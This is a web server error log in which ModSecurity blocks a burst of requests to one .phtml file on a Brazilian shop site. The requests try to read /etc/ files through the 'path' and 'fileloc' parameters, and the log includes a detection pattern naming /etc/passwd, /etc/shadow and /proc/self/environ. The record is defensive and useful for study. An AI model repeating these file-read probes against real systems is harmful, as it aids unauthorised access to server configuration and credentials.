[Fri Mar 20 08:57:23.158332 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.60:58870] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02I_XLqtnMIWvjpaKlzAAAApY"]
[Fri Mar 20 08:57:23.306473 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.108:58876] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IwF0L0L-SsrnPo5z8wAAAsU"]
[Fri Mar 20 08:57:23.415088 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.53:58878] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02I11pVZ5mVmJwsFM8uAAAAEA"]
[Fri Mar 20 08:57:23.688301 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.65:58882] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02I7ninkcc-iUj5Apo5gAAA40"]
[Fri Mar 20 08:57:24.303990 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.39:58900] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JF1pVZ5mVmJwsFM8uwAAAFg"]
[Fri Mar 20 08:57:24.470474 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.59:58904] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JF1pVZ5mVmJwsFM8vAAAAE8"]
[Fri Mar 20 08:57:24.825537 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.96:58910] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JDJ3M9BSuKP7CAYp8QAAAJg"]
[Fri Mar 20 08:57:25.143744 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.95:58924] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JfqxLDW4GITHUkT0ewAAARc"]
[Fri Mar 20 08:57:25.459755 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.112:58930] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JRCii7xarUs8iHZyewAAAhM"]
[Fri Mar 20 08:57:26.318895 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.26:58954] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Jl1pVZ5mVmJwsFM8vwAAAFA"]
[Fri Mar 20 08:57:26.525812 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.55:58934] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Jta6ubjKNq_cu4bhEQAAA0Q"]
[Fri Mar 20 08:57:27.480118 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.54:58984] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02J_HIg5MgXLBnicMB-AAAAcc"]
[Fri Mar 20 08:57:27.624084 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.45:58986] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JwF0L0L-SsrnPo5z9QAAAsg"]
[Fri Mar 20 08:57:27.879985 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.56:58992] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02JxCii7xarUs8iHZyfAAAAgw"]
[Fri Mar 20 08:57:28.142859 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.16:58996] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KPqxLDW4GITHUkT0fAAAAQw"]
[Fri Mar 20 08:57:28.828259 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.7:59014] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KNa6ubjKNq_cu4bhEwAAA0M"]
[Fri Mar 20 08:57:29.170331 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.39:59026] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Kbninkcc-iUj5Apo8QAAA5A"]
[Fri Mar 20 08:57:29.500048 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.68:59008] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KfXLqtnMIWvjpaKlzwAAApU"]
[Fri Mar 20 08:57:29.997697 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.38:59044] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KTJ3M9BSuKP7CAYp8gAAAII"]
[Fri Mar 20 08:57:30.283979 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.37:59048] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KgF0L0L-SsrnPo5z9gAAAsk"]
[Fri Mar 20 08:57:30.691201 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.61:59054] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KvqxLDW4GITHUkT0fQAAARY"]
[Fri Mar 20 08:57:31.012206 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.56:59066] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02KzJ3M9BSuKP7CAYp8wAAAJY"]
[Fri Mar 20 08:57:31.259723 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.38:59070] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02K_qxLDW4GITHUkT0fgAAAQU"]
[Fri Mar 20 08:57:31.743021 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.5:59082] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02K7ninkcc-iUj5Apo9wAAA5I"]
[Fri Mar 20 08:57:31.813315 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.84:59086] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02K7ninkcc-iUj5Apo-AAAA4A"]
[Fri Mar 20 08:57:32.131935 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.3:59096] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LF1pVZ5mVmJwsFM8wQAAAFU"]
[Fri Mar 20 08:57:32.775718 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.92:59118] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LPqxLDW4GITHUkT0fwAAARU"]
[Fri Mar 20 08:57:33.055537 2026] [:error] [pid 9818:tid 140411658000128] [client 57.141.18.91:59122] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LV1pVZ5mVmJwsFM8wwAAAEo"]
[Fri Mar 20 08:57:34.820498 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.113:59138] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02LuoXxyEfFpUF8f-LqgAAAVg"]
